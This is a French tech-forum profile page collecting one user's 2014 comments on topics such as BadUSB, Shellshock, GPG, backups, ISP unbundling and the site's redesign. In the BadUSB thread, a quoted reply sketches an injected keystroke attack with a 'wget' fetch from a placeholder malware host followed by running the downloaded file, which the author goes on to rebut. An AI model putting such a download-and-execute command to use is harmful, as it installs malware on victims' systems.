votre avatar Abonné

alex.d.

est avec nous depuis le 3 septembre 2009 ❤️

4904 commentaires

Le 13/11/2014 à 11h 51

À l’époque des RIB, le mandat de prélèvement papier était obligatoire (même si certains ne le demandaient pas, et étaient hors la loi). Mais désormais avec les virements SEPA, le mandat électronique est explicitement reconnu. Ils pourraient faire un effort chez Sosh.

 

Le 06/11/2014 à 14h 06

GPG n’a rien de lourdingue s’il est correctement intégré au client mail.

Le 22/10/2014 à 14h 21







mikkado06 a écrit :



a part les claviers/souris microsoft (qui sont deja a moitier pour les geeks, la majorité se contentant de leur souris dell/carrefour fournie) quels produits physiques microsoft ont percé? 



La XBox est quand même un tout petit peu célèbre.


Le 20/10/2014 à 15h 08







unCaillou a écrit :



Curiosité : Comment il compte les emails des salariés ? Si ils utilisent un webmail (la majorité aujourd’hui), le patron fait du MITM ?



Bah les logs du serveur smtp. Elle le faisait probablement depuis son adresse mail pro.

 


Le 16/10/2014 à 07h 51

Thanks for all of your feedback on this bug. We’ve heard you loud and clear.We plan to re-enable ext2/3/4 support in Files.app immediately. It will come back, just like it was before, and we’re working to get it into the next stable channel release.

Marche arrière toute ! bug 315401 

Le 13/10/2014 à 21h 56







127.0.0.1 a écrit :



(*) Faut bien avouer que c’est pas le format le plus utilisé pour formater un support de stockage externe. 



 Clairement. ext4, c’est bon pour le disque système. Les gros volume de données, c’est plutôt XFS.


Le 15/10/2014 à 14h 47







damaki a écrit :



 Ou alors plus rigolo, des trucs écrits dans des languages qui sont pas évidents à cross compiler en ARM (camel, par exemple). 



OCaml supporte officiellement l’ARM, pourtant.

 


Le 13/10/2014 à 16h 36

Bref, ils mesurent la vitesse du peering plutôt que la vitesse du lien.

 

Le 13/10/2014 à 09h 19







slow brain a écrit :



Bientôt un retour au système de saisie Palm ?





Ah, le système Graffiti du Palm Pilot ! Ceci ne nous rajeunit pas. C’est clair que c’est la même chose.

C’est encore supporté dans WebOS ?

 


Le 10/10/2014 à 07h 54







5francs a écrit :



@ Trollounet : avez-vous déjà participé à un dépouillage? j’ai eu l’occasion de le faire, s’il est fait dans les règles, c’est impossible de tricher.



Le seul risque que je vois c’est lors de la consolidation des résultats pour les remonter vers le ministère de l’intérieur, la je ne sais pas comment vérifier la véracité des votes.





Un “dépouillage” ? Un dépouillement, ça ira.



Pour vérifier la sincérité des résultats transmis, c’est simple : les préfectures publient les résultats reçus, bureau par bureau. C’est disponible sur le site web du ministère de l’intérieur. Tous ceux qui étaient présents au dépouillement peuvent vérifier que le résultat officiel de son bureau est bien le bon.

Et tout le monde peut télécharger tous les résultats et refaire les additions.


Le 08/10/2014 à 15h 08







ar7awn a écrit :



après aussi je ne trouve pas très fair-play de décompiler un logiciel propriétaire a plusieurs milliards de valeur. Surtout qu’il y a des protocoles libres équivalent, il faut respecter les licences.





 La différence entre un protocole équivalent et le protocole original, c’est l’interopérabilité.


Le 08/10/2014 à 14h 41







Yseader a écrit :



C’est fort quand même, accuser Microsoft “d’étouffer les concurrents” alors que la boite qui se plaint contrevient elle même à la loi <img data-src=" /> D’autant plus qu’il existe d’autres protocoles libres qu’ils auraient pu utiliser comme base au lieu de casser l’algorithme de Skype





Ils ne contreviennent pas à la loi.

Le reverse enginering pour l’interopérabilité est une exception à la protection des logiciels qui est explicitement prévue dans la loi DADVSI.

&nbsp;


Le 08/10/2014 à 14h 11







yep a écrit :



Idem pour une carte réseau: quand je connecte mon câble USB, le DHCP est lancé automatiquement et j’ai internet. Pourquoi ça ne fonctionnerai pas avec une carte réseau USB?

&nbsp;



Lancer automatiquement un DHCP sur une carte qu’on connaît, et sur laquelle on branche un câble Ethernet, c’est différent de brancher une nouvelle carte réseau.

Dans un cas, la carte réseau est connue du système et on a mémorisé qu’il fallait faire un DHCP dès qu’on détecte un câble Ethernet (toujours sur la même carte) ; dans l’autre cas, c’est un nouveau device sorti de nulle part, que l’on n’utilise pas par défaut.


Le 05/10/2014 à 22h 12







yep a écrit :



&nbsp;Et une clé USB qui tout d’un coup passe en clavier et entre “ALT+F2” “termial” “wget&nbsp;&nbsp; http://monvirus.com” ./monvirus &” “exit” ?





Encore faudrait-il qu’il y ait un terminal ouvert. Cette attaque ne fait rien de plus que ce que ferait quelqu’un qui a accès physique à ton clavier.

Je n’ai jamais de console ouverte qui ne soit pas verrouillée, qu’elle soit texte ou graphique. Ce n’est pas par peur des virus, juste de mes gamins (qui savent changer de VT).

Après, le machin peut toujours tenter d’ouvrir une xterm pendant que ça n’est pas verrouillé, quand je suis devant le PC. Faut déjà qu’il trouve la bonne combinaison de touche sous openbox. Et qu’il ne se fasse pas pécho lors de tentatives ratés sous mes yeux. Et que les messages du noyau lors du changement de type de device n’attirent pas mon attention. Et qu’il utilise la bonne keymap. Bon, ça fait beaucoup de si. Une attaque ciblé sur une personne précisément par la CIA, avec du renseignement en amont, éventuellement ça peut marcher. Un virus qui tape au petit bonheur la chance, bof.


Le 05/10/2014 à 21h 48







psn00ps a écrit :



Regarde les détails page 11 du pdf de Blackhat.

Le mot de passe est volé de façon transparente quand tu le saisis.

https://srlabs.de/badusb/

https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf





Pour voler mon mot de passe, ils ont besoin d’avir déjà installé un LD_PRELOAD.

Il savent cracker un PC, mais à condition de l’avoir déjà cracké.



Bref, quand une boite de “sécurité informatique”, qui fait son business en vendant des solutions à des failles imaginaires, trouve une nouvelle faille, il y a lieu de se méfier. De la boîte, pas de la faille.


Le 05/10/2014 à 21h 46







earendil_fr a écrit :



Ben si (en tout cas avec NM ou WiCD)… Si tu branches une carte réseau USB et quelle se simule comme étant monté et “op”, le système va essayer de faire du DHCP dessus. Et si ton firmware renvoie les réponse au DHCP, c’est OK.



Regarde avec un adaptateur USB RJ45.





J’ai monté un routeur sous Linux avec 3 interfaces réseau, dont une en USB. Heureusement que ça ne fait pas des DHCP automatiquement sur tous les ports Ethernet, sinon, je ne vois même pas comment tu peut configurer un routeur sans finir à l’asile.

Ça ne le fait automatiquement que si tu as explicitement mis ‘auto’ et ‘dhcp’ dans ton /etc/network/interfaces pour chacune des interfaces.

NM, je n’en veux pas, ça n’attire que des problèmes. wicd, je le confine au wifi (câblé en dur sur wlan0, qui ne peut pas être spoofé par une clef USB puisque udev donne des noms statiques).


Le 05/10/2014 à 12h 41







yep a écrit :



Ce que les personnes de SRLabs ont fait, est une carte réseau factice qui (d’après ce que j’ai compris) possède un serveur DNS, mais pas de gateway. Du coup, le système demande à cette carte réseau à quelle adresse IP est paypal.com et elle retourne une adresse IP d’un site de fishing. On se connecte sur ce site, on entre notre login/password et voila… On s’est fait avoir.





Sauf que sur un système normal – sous Linux, du moins – une carte réseau qui sort de nulle part, elle n’est pas configurée automatiquement, et on n’y envoie pas les requêtes DNS sans l’avoir demandé explicitement. Pareil pour un device clavier ou souris, que veux-tu qu’il fasse ? Sans mot de passe root, il ne peut rien faire. Faire quelque chose sur mon login ? On le voit en direct et il se fait griller. Et quand je ne suis pas devant le PC, xlock, donc là encore il faut le mot de passe.

Si on a un OS un minimum sécurisé, je ne vois pas la faille.


Le 04/10/2014 à 13h 48







lol.2.dol a écrit :



Non, rien à voir avec une quelconque faille. Les types du SRLabs montrent qu’en modifiant le firmware USB, ils présentent d’abord une clé USB en tant que clé USB puis discrètement présentent des descripteurs d’autres périphériques :





  • Interface réseau : permettant de rediriger les flux DNS

  • Périphérique de saisie (clavier) : permettant de faire un keylogger (sous Linux)

  • Faut periph de thetering : permettant de lire tout le traffic





    Ce n’est pas une faille de l’OS que d’accepter l’installation d’un périphérique qu’on lui propose!

    <img data-src=" /> <img data-src=" />

    Rien à voir avec l’OS : encore une fois il s’agit d’un périphérique USB qui est faussement présenté à l’OS. Linux, Mac, BSD (enfin si ils sont un peu user-friendly), vont installer le périphérique présenté. Webcam, clavier, cléWiFi,…





    Je ne vois pas comment ça peut atteindre Linux. Un Linux bien élevé va certes créer automatiquement un device réseau si la clef se présente comme interface réseau, mais il ne va pas faire d’ifup automatique dessus si on ne l’a pas configuré dans /etc/network/interfaces (ou dans NetworkManager, pour les jeunes), et encore moins l’utiliser comme source DNS par défaut.

    Pareil pour le clavier, un clavier ne reçoit pas les saisies des autres claviers.

    Pour le tethering, c’est une notion qui n’existe pas au niveau matériel. Le tethering, c’est juste carte réseau+routage.


Le 06/10/2014 à 11h 11

Ah, et il y a encore des cookies en pcinpact.com, qu’il faut autoriser manuellement pour que le login marche.

&nbsp;

Le 06/10/2014 à 11h 03

Ça rame ! Alors qu’avant, sur v6.nextinpact.com, ça ne ramait pas…

Le 29/09/2014 à 09h 38







Mme_Michu a écrit :



Voilà, la plupart des gens qui les achètent en sont conscients..

Du coup est ce qu’ils veulent quand même lutter contre “cette obsolescence programmée” ? , à moins d’augmenter le pouvoir d’achat des gens <img data-src=" />

Beaucoup de gens préféraient avoir de l’électroménager chez Dyson , Tefal/moulinex, sauf qu’ils n’ont pas trop les moyens.





Mouais, bof. L’électroménager de marque qui dure 20 ans ne coûte pas 4 fois plus cher que le jetable qui dure 5 ans. Le jetable coûte plus cher au final.


Le 25/09/2014 à 20h 13







earendil_fr a écrit :



Non: par contre quelqu’un peut faire le nécessaire pour que ton serveur Apache en lance une…





Ton exemple était avec ssh, qui n’a aucun rapport avec la faille.

Et sinon, mon serveur apache n’a pas de cgi activés. Encore moins avec du shell. Et de toute façon, le shell de mon user www-data, c’est dash, pas bash.


Le 25/09/2014 à 19h 27







Jed08 a écrit :



Pour tous ceux qui se demandent ce qu’on peut réellement faire de méchant avec cette vulnérabilité essayez de taper cette commande, et vous comprendrez :





(pour ceux qui ne l’aurez pas remarqué c’est une fork bomb)





Pas besoin de faille pour faire une fork bomb.


Le 25/09/2014 à 14h 03







Citan666 a écrit :



Le CHROOT ça avait l’air puissant comme solution, mais je comprends pas tout. Aurais-tu par hasard un tuto/doc compréhensible par un Mickey (apprenti sorcier) admin sys ? <img data-src=" />





https://www.debian.org/doc/manuals/securing-debian-howto/ap-chroot-apache-env.fr…


Le 25/09/2014 à 13h 29







127.0.0.1 a écrit :



C’était une explication “simpliste” comme demandée par le posteur.



Dans la réalité, le compte “invité” se créera une variable d’env avant de se connecter au serveur via ssh par exemple, et le daemon sshd (root) du serveur va accepter la variable d’env (directive AcceptEnv), lancer bash et executer la commande de la mort.



Ca doit surement être le genre d’attaque qui est lancé depuis ce matin sur les serveurs du web…





Sauf que sshd abandonne les droits root avant de lancer bash. Donc non, ça ne marche pas ton scénario.

En plus, un compte invité avec ssh activé, tu peux virer l’admin pour faute grave.


Le 25/09/2014 à 13h 26







ragoutoutou a écrit :



Tu pars du principe que le noob a écrit le cgi…



… moi je pars du principe que le noob bosse dans une adminstration/grande entreprise et s’est vu refiler la gestion du serveur, et qui a suivi une procédure pas à pas d’installation du progiciel xyz…



Sérieusement, quand tu regardes, les softs “pro”, tu en as un paquet dont le manuel d’installation commence par “comment installer un red hat d’il y a deux ans depuis le cd”, avec des screenshots pour que le noob sache où cliquer sur next et où désactiver SELinux.





Pour un serveur un peu critique, genre apache (a fortiori avec cgi), serveur NFS, ou bastion ssh, si l’admin n’a pas les notions de sécurité élémentaires, il est quasi-certainement vulnérable, faille ou pas faille.


Le 25/09/2014 à 13h 10







psn00ps a écrit :



Je crois que tu es bisounours sur ce coup là <img data-src=" />





ET pourtant toutes les docs apache disent bien que le serveur ne doit pas pouvoir réécrire les documents, surtout les documents dynamiques. Un admin consciencieux va même au-delà, et isole son serveur apache (VM, ou au moins chroot).

En tout cas, c’est ce que je fais.


Le 25/09/2014 à 13h 06







ragoutoutou a écrit :



Malheureusement si…



En entreprise, bon nombre de personnes bombardées “admin linux” ne font que suivre des recettes de cuisine et n’ont aucune idée de ce qui se passe à l’étage en dessous.





Un noob qui fait des cgi, il n’a pas besoin de faille bash pour se tirer une balle dans le pied tout seul comme un grand.


Le 25/09/2014 à 11h 57







Ailiosa a écrit :



Ouai mais là t’es en train de dire que la majorité des utilisateurs savent configurer correctement les users et n’utilisent pas le root. <img data-src=" />



Lequel des deux scénarios est le plus fumeux? <img data-src=" />





Les gens qui installent un serveur web, et activent les cgi, je pense que la majorité d’entre eux ne sont pas des noobs.


Le 25/09/2014 à 11h 51







LordZurp a écrit :



en gros, le programme bash (qui est un peu la base de tout système linux, et est utilisé par quasiment tous les autres programmes) se foire quand on lui envoie une commande spécialement écrite pour.c’est utilisable via le web : quand tu accèdes à un site, ton navigateur dit “je suis X, je veux voir la page Y”, le serveur web passe l’info au bash “ya X qui veut voir Y, envoie moi la page”. l’attaque ferait “je suis X, je veux voir Y, et en passant efface tout le disque” et le bash execute toute la commande sans verificationen gros, le programme bash (qui est un peu la base de tout système linux, et est utilisé par quasiment tous les autres programmes) se foire quand on lui envoie une commande spécialement écrite pour.c’est utilisable via le web : quand tu accèdes à un site, ton navigateur dit “je suis X, je veux voir la page Y”, le serveur web passe l’info au bash “ya X qui veut voir Y, envoie moi la page”. l’attaque ferait “je suis X, je veux voir Y, et en passant efface tout le disque” et le bash execute toute la commande sans verification





Tout ça ne passe dans des variables d’environnement shell que dans la cas de cgi. Pour un simple site web statique, pas de bash. Pas de cgi, pas de vulnérabilité.


Le 18/09/2014 à 15h 32







Commentaire_supprime a écrit :



Et Latex, \itshape \c{c} a compte \upshape ?



<img data-src=" /><img data-src=" /><img data-src=" /><img data-src=" /><img data-src=" />





Ça c’est du TeX. En LaTeX, ce serait plutôt \textit{comme ça}.


Le 10/09/2014 à 15h 47







Konrad a écrit :



Tout à fait. Étant parano je cumule ces solutions :





  • RAID 1 sur mon PC principal

  • rsync quotidien sur un RAID 5 sur mon serveur

  • rsync sur mon laptop quand je l’allume

  • rsync sur disque dur externe quand je le branche

  • rsync sur clé USB



    Voilà pour mes documents les plus importants en tout cas (~30 Go).





    Tout ça c’est de la réplication. Si un fichier se retrouve corrompu sur l’original, ton rsync propage la corruption partout et tu n’es pas plus avancé que si tu n’avais pas de sauvegarde.

    Essaie de mettre au moins un rsnapshot quelque part.


Le 10/09/2014 à 07h 47







Jésus m’a sauver a écrit :



Ils le font parce que c’est nouveau en France. Il y a un peu plus de deux ans, c’était encore interdit de citer un concurrent dans une publicité (généralement pour le descendre). C’est pour ça que depuis deux ans, on voit des sites de comparaisons de produits concurrents à la pelle. Du type: quiestlemoinscher.com (de Leclerc, il me semble),, etc.





Sauf que c’est autorisé depuis 1992 pour des produits identiques, 2001 pour des produits similaires.


Le 03/09/2014 à 15h 34







Lucretia Valentine a écrit :



Heu, si je ne m’abuse, il y a déjà un OS assez récent sur le marché qui propose un concept de simplicité assez similaire : FirefoxOS.





FirefoxOS, Tizen, SailfishOS, Ubuntu Touch, etc.


Le 02/09/2014 à 13h 34







David_L a écrit :



Vous avez bien le lissage des police activé . Quelle définition / Navigateur ?





1920x1200, écran 24 pouces, testé sur chromium et firefox.

Avec le zoom à 100%, c’est beaucoup trop gros et la lecture est pénible. Il faut descendre à 75% pour que ce soit correct.

Par rapport à la police de la v5, elle n’a pas le même ratio hauteur/largeur, et c’est sans doute ça qui rend la lecture pénible. Le dessin arrondi des lettres n’améliore pas la lisibilité non-plus… C’est joli, élégant, mais je ne me vois pas lire un dossier de plusieurs pages avec cette police.


Le 02/09/2014 à 13h 15

Bon, visiblement pour être compté comme “majoritaire”, il faut répéter quelque chose déjà dit par d’autres.

La police n’est pas lisible. Ce n’est pas un problème de taille, de disposition ou autre, c’est vraiment la police elle-même qui rend la lecture désagréable.

Sinon, tout le reste de la v6, c’est top.

Le 08/08/2014 à 12h 17







FRANCKYIV a écrit :



PGP est en closed source non ?



Backdoor tout ça non ?





Le PGP originel d’il y a 25 ans n’était pas libre, mais le code source était quand même déjà ouvert. Mais maintenant, il y a GPG, libre, ouvert, et 100% compatible PGP.


Le 17/07/2014 à 14h 41







cyrano2 a écrit :



On s’en fout. L’idée est de faire découvrire comment cela marche pour 1) faire des vocations 2) comprendre quand le marketing leur fait prendre des vessies pour des lanternes.





Bah non, sinon ils auraient parlé d’initiation à l’informatique, pas de codage.

Il n’est pas question d’algo, d’archi, ni de modèle OSI, mais bel et bien de code.


Le 17/07/2014 à 14h 07

C’est curieux cette idée de se focaliser sur le code, alors que la notion à enseigner serait plutôt la programmation.

Le 17/07/2014 à 13h 19







Ohmydog a écrit :



Ben il y a une raison simple : c’est matériellement impossible de gérer 25 millions de contrats. Alors, moi je veux bien que chacun négocie son contrat, ça fera davantage de boulot pour ma profession, mais ça a un coût.





Il n’y a que les FAI (et encore, pas tous) qui te migrent autoritairement vers la dernière version du contrat, les autres savent faire. Les opérateurs mobiles changent leurs offres très souvent, mais les anciens contrats courent toujours. Certains ont gardé leur formule Itinéris pendant 10 ans, aux mêmes conditions, même tarif.


Le 17/07/2014 à 12h 56







Niktareum a écrit :



Rien que dire bonjour a l’avoué (obligatoire en cassation, en plus de l’avocat) désintègre ta cb sur 3 générations !!!





Et non, plus d’avoué depuis 2012 !



Le 27/06/2014 à 09h 30







Obidoub a écrit :



Il faut trouver une solution rapidement car on ne peut pas légitimer le fait qu’un opérateur ne partage pas son réseau alors que les autres sont obligés de le faire. Imaginez si tout le monde faisait ça, le bordel…

Ils n’ont qu’à faire un système de collecte comme en ADSL non dégroupé, ce doit être possible non ?





Bien sûr que c’est possible, ils le font déjà avec BT et autres. Sauf que c’est actuellement régi par des accords de gré à gré (i.e. tarif tête du client), pas avec un prix catalogue réglementé, et sans obligation. S’ils veulent louer à BT et pas à Free ni Orange, actuellement ils peuvent, et ils le font. Pendant ce temps, Orange n’a pas le droit de refuser de la collecte ADSL à un autre opérateur.


Le 26/06/2014 à 22h 09







TBirdTheYuri a écrit :



Techniquement, même dans 20 ans on ne pourra pas dégrouper un réseau dont la topologie est de type “Bus”.

Il n’y a que les réseau en topologie étoile (DSL, RTC…) qui peuvent l’être.





Certes. Mais tu peux revendre de la collecte, et être obligé par l’ARCEP à revendre de la collecte à tarif réglementé, comme c’est le cas sur l’ADSL avec la collecte Orange.


Le 26/06/2014 à 22h 04

Évidemment, en DOCSIS la boucle locale est mutualisée, donc le dégroupage option 1 n’est pas possible. Mais l’option 3 et l’option 5 sont possibles. D’ailleurs, ils le font avec BT, Darty, et autre AuchanBox.

Le 24/06/2014 à 08h 11

Bref, c’est un retour aux sources. Le tout premier navigateur web de l’histoire (WorldWideWeb/Nexus) était déjà un éditeur en même temps.

Pareil pour Netscape qui intégrait Composer par défaut.

Le 03/06/2014 à 07h 53







drx95 a écrit :



Euh …

Sur des offres pro tu as du débit garantit ce qui n’est pas le cas sur une offre grand public, après quand on parle d’une ligne 2mb en pro généralement c’est symétrique, pour ça l’opérateur monte virtuellement 2 liens (1 en monté et 1 en descente sur des technos DSL)

Et la GTR ça te permet d’avoir une garantie de rétablissement c’est ce qui coûte le plus cher(en gros en cas d’incident il priorise un technicien sur ton problème normal que tu payes plus cher) et même avec 2 liens t’es jamais content quand 1 des 2 liens est cassé et t’es super pressé qu’ils te remettent en marche tout comme ça devrait parce que à la moindre perturbation supplémentaire t’es mort après t’enclenche des sites de replis etc mais le coût est nettement plus important

Pour illustrer un peu le propos, imagine que tu as une boutique ne ligne, tu fais 5000€ de CA par jour avec un petit 3-4% de marge net, ton service est coupé 4h tu perds pas loins de 2k€ de CA sans parler du déficite d’image avec tes clients qui vont aller chez le concurrent parce que le site concurrent est plus ou moins au même tarif mais lui il marche bien et qu’il ne reviendront pas avant un moment





Si tu penses qu’une boutique en ligne avec 2M€ de CA par an, ça s’héberge sur une ou deux xDSL, tu peux aussi être viré pour faute professionnelle, GTR ou pas <img data-src=" />


Le 02/06/2014 à 22h 03







Zappi a écrit :



Free pour un pro si c’est un auto-entrepreneur ou une pme de 2-3 personnes et dont Internet n’est pas vital pour son activité ok sinon c’est jouer avec le feu.

La SLA de 2 heures tu es bien content de l’avoir lors d’une grosse merde.





Si internet est vital, tu ne te reposes pas sur les GTR ou autre SLA, ça n’est qu’une garantie d’indemnisation quand ça merde.

Quand c’est vraiment vital, tu prends 2 abonnements chez 2 fournisseurs différents, avec 2 opérateurs de collecte différents. Et une clef 3G en backup si une pelleteuse arrache malencontreusement tes 2 lignes d’un coup.


Le 28/05/2014 à 09h 47







Nathan1138 a écrit :



Jamais compris l’intérêt du DRM sous Deezer.





Ça sert pour les procès, justement. S’il n’y avait pas de DRM, l’enregistrement serait légalement possible. Avec DRM, même bidon, l’enregistrement nécessite un cassage de DRM, ce qui tombe sous le coup de la loi DADVSI.



Le 26/05/2014 à 15h 14

Nan mais attention, là ils veulent rompre la neutralité, mais dans le respect des règles de neutralité. Et ça change tout.

Le 22/05/2014 à 21h 58







Homo_Informaticus a écrit :



Pas de projets de développement de matériel réseau ou d’OS (même si pas à destination du grand public), développé par ou en relation avec ces agences pour garantir un réseau sécurisé ?







On a Amesys.